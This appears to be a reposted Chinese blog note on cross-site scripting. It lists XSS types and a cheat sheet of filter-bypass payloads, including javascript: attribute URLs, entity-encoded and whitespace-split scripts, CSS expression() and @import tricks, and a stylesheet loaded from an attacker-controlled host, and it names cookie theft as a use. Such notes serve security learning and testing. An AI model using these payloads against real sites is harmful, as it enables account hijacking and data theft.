web安全 xss攻击

来源:互联网 发布:java中的log怎么用 编辑:程序博客网 时间:2024/05/02 07:47
xss 分类
    1.反射型:一般出现在搜索栏,用户登陆口等地方
    2.持久型:留言,评论,博客日志等地方
xss的构造
    1.利用<>标签引入
    2.利用hmtl的属性值来执行
        eg:<img src="javascript:alert(/xss/)">
        属性还有:href,lowsrc,bgsound,background,value,action,dynsrc
    3.空格和回车绕过过滤
        eg:<img src="java scr ipt:alert(/xss/)">
    4.对标签进行转码
        <img src="javascrip&#116&#58alert(/xss/);">
    5.利用css跨站剖析
        1.css直接执行
            eg:<div style="background-image:url(javascript:alert('xss'))">
        2.css远程引入
            eg:http://www.yxs.com/attack.css里面有这些东西
            p{
                background-image:expression(alert('xss'))
            }
        然后目标网站的可以引入
            <link rel="stylesheet" href="http://www.yxs.com/attack.css">
        3.import直接执行
            <style>
                @import 'javascript:alert("xss")'
            </style>    
        4.利用/***/ \ \0 等扰乱过滤
            eg:<img src="javas/***/cript:alert(/xss/)">

        5.利用字符编码
            eg1:hmtl里面的某些属性值可以用&#ASCII的方式进行编码改写
                <img src="&#106.....&#116&#58....">
                eg2:eval()可以执行\连接十六进制的的字符串的js脚本
        6.拆分跨站法(自己百度去)
            对于输入有限制的很有用
        7. 远程调用shellcode
xss利用方式
                1.cookie的窃取
        2.CSRF的伪造表单等东西cookie的欺诈   
0 0
原创粉丝点击